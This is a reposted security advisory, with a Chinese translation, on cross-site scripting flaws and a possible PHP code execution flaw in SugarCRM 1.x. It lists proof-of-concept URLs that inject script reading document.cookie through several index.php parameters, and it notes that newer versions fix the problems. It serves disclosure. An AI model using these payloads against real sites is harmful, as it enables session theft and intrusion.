[转载]SugarCRM跨站脚本攻击漏洞以及代码执行漏洞测试方法
信息来源:[url]www.securityfocus.com[/url]Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM
Added by: A^C^E
Date: 02.01.05
Time: 09:52:34
Category: Exploits
Source: [url]http://www.securityfocus.com/archive/1/385884/2004-12-30/2005-01-05/0[/url]
----------------------------------------------------------------------------
Cross Site Scripting Vulnerabilities and Possible Code Execution in
SugarCRM
----------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of
a
state-of-the-art user interface. Built on PHP and MySQL
Web : [url]http://sugarcrm.sourceforge.net[/url]
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting Vulnerability
A1. In the main script (index.php) various parameters, that are used to
write the
html code, not are verified.
At least the following URLs are vulnerables to XSS (Cross Site
Scripting) attacks :
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=[/url]"><script>alert(document.cookie)</script>&return_action=index
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action=[/url]"><script>alert(document.cookie)</script>
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%[/url]
3Ealert%28document.cookie%29%3C%2Fscript%
3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search
And the following are XSS vulnerables and, may be, arbitrary PHP remote
code execution
vulnerables as well :
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts[/url]"><script>alert(document.cookie)</script>&record=d676f046-
1be5-dc36-114e-4138f972bf5d
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts[/url]''''&record=[RECORD
ID]"><script>alert(document.cookie)</script>
The fix:
~~~~~~~~
All problems are fixed in the latests versions availables at the
sugarcrm site.
Go to [url]http://sugarcrm.sourceforge.net[/url] site for more info about the new
versions.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es 翻译网站:[url]http://www.bnso.net[/url]
Bug.Center.team翻译小组
来源: Joxean Koret <joxeankoret () yahoo ! es>
日期: 2005-01-01 19:58:44
安全通告:<1104609524.17665.4.camel () nemobox>
受影响软件的描述:
SugarCRM 1.X是一个管理向导,时机,社会联系并且都在一个最新型的用户界面内,它建立在PHP 和MySQL上 。
网站 : [url]http://sugarcrm.sourceforge.net[/url]
漏洞描述:跨站脚本漏洞
在主要的脚本(index.php)中有用于写html代码的各种不同的参数没有被确认。
至少下面的网址就很容易被跨站脚本攻击:
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_[/url] \
module="><script>alert(document.cookie)</script>&return_action=index
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_[/url] \
module=&return_action="><script>alert(document.cookie)</script>
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%[/url]
3Ealert%28document.cookie%29%3C%2Fscript%
3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Sea \
rch
这下面网址是跨站脚本攻击漏洞并且可能远程执行任意PHP代码
漏洞如下:
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts[/url]"><scr \
ipt>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d
[url]http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts[/url]''''&r \
ecord=[RECORD ID]"><script>alert(document.cookie)</script>
修补方法:升级到最新版本
网址 : [url]http://sugarcrm.sourceforge.net[/url]
发现者: Jose Antonio Coret (Joxean Koret)
页:
[1]